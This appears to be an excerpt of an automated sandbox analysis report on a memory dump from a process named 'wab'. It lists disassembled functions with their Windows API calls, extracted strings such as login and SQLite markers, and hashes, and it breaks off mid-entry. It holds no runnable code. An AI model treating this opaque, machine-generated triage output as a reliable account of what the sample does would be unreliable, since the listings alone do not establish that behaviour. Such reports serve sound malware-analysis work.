                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 1284135714-318151290
                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                • String ID: 0$6
                                • API String ID: 4066108131-3849865405
                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                APIs
                                • memset.MSVCRT ref: 004082EF
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                • memset.MSVCRT ref: 00408362
                                • memset.MSVCRT ref: 00408377
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharMultiWide
                                • String ID:
                                • API String ID: 290601579-0
                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memchrmemset
                                • String ID: PD$PD
                                • API String ID: 1581201632-2312785699
                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                • GetDC.USER32(00000000), ref: 00409F6E
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                • GetParent.USER32(?), ref: 00409FA5
                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                • String ID:
                                • API String ID: 2163313125-0
                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$wcslen
                                • String ID:
                                • API String ID: 239872665-3916222277
                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$_snwprintfmemset
                                • String ID: %s (%s)$YV@
                                • API String ID: 3979103747-598926743
                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                APIs
                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                • wcslen.MSVCRT ref: 0040A6B1
                                • wcscpy.MSVCRT ref: 0040A6C1
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                • wcscpy.MSVCRT ref: 0040A6DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                • String ID: Unknown Error$netmsg.dll
                                • API String ID: 2767993716-572158859
                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                APIs
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 0040DAFB
                                • wcscpy.MSVCRT ref: 0040DB0B
                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                • API String ID: 3176057301-2039793938
                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                APIs
                                Strings
                                • out of memory, xrefs: 0042F865
                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                • database %s is already in use, xrefs: 0042F6C5
                                • database is already attached, xrefs: 0042F721
                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                • too many attached databases - max %d, xrefs: 0042F64D
                                • unable to open database: %s, xrefs: 0042F84E
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                • API String ID: 1297977491-2001300268
                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                • memcpy.MSVCRT ref: 0040EB80
                                • memcpy.MSVCRT ref: 0040EB94
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                • String ID: ($d
                                • API String ID: 1140211610-1915259565
                                • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                APIs
                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                • GetLastError.KERNEL32 ref: 004178FB
                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ErrorLastLockSleepUnlock
                                • String ID:
                                • API String ID: 3015003838-0
                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                APIs
                                • memset.MSVCRT ref: 00407E44
                                • memset.MSVCRT ref: 00407E5B
                                • _mbscpy.MSVCRT ref: 00407E7E
                                • _mbscpy.MSVCRT ref: 00407ED7
                                • _mbscpy.MSVCRT ref: 00407EEE
                                • _mbscpy.MSVCRT ref: 00407F01
                                • wcscpy.MSVCRT ref: 00407F10
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                • String ID:
                                • API String ID: 59245283-0
                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                • GetLastError.KERNEL32 ref: 0041855C
                                • Sleep.KERNEL32(00000064), ref: 00418571
                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                • GetLastError.KERNEL32 ref: 0041858E
                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                • String ID:
                                • API String ID: 3467550082-0
                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                • memset.MSVCRT ref: 00413ADC
                                • memset.MSVCRT ref: 00413AEC
                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                • memset.MSVCRT ref: 00413BD7
                                • wcscpy.MSVCRT ref: 00413BF8
                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                • String ID: 3A
                                • API String ID: 3300951397-293699754
                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                • wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                • wcslen.MSVCRT ref: 0040D1D3
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                • memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                • String ID: strings
                                • API String ID: 3166385802-3030018805
                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                APIs
                                • memset.MSVCRT ref: 00411AF6
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 00411B14
                                • wcscat.MSVCRT ref: 00411B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                • String ID: AE$.cfg$General$EA
                                • API String ID: 776488737-1622828088
                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                APIs
                                • memset.MSVCRT ref: 0040D8BD
                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                • memset.MSVCRT ref: 0040D906
                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                • _wcsicmp.MSVCRT ref: 0040D92F
                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                • String ID: sysdatetimepick32
                                • API String ID: 1028950076-4169760276
                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: -journal$-wal
                                • API String ID: 438689982-2894717839
                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Dialog$MessageSend
                                • String ID:
                                • API String ID: 3975816621-0
                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                APIs
                                • _wcsicmp.MSVCRT ref: 00444D09
                                • _wcsicmp.MSVCRT ref: 00444D1E
                                • _wcsicmp.MSVCRT ref: 00444D33
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$wcslen$_memicmp
                                • String ID: .save$http://$https://$log profile$signIn
                                • API String ID: 1214746602-2708368587
                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                APIs
                                • GetClientRect.USER32(?,?), ref: 00405F65
                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                • GetWindow.USER32(00000000), ref: 00405F80
                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
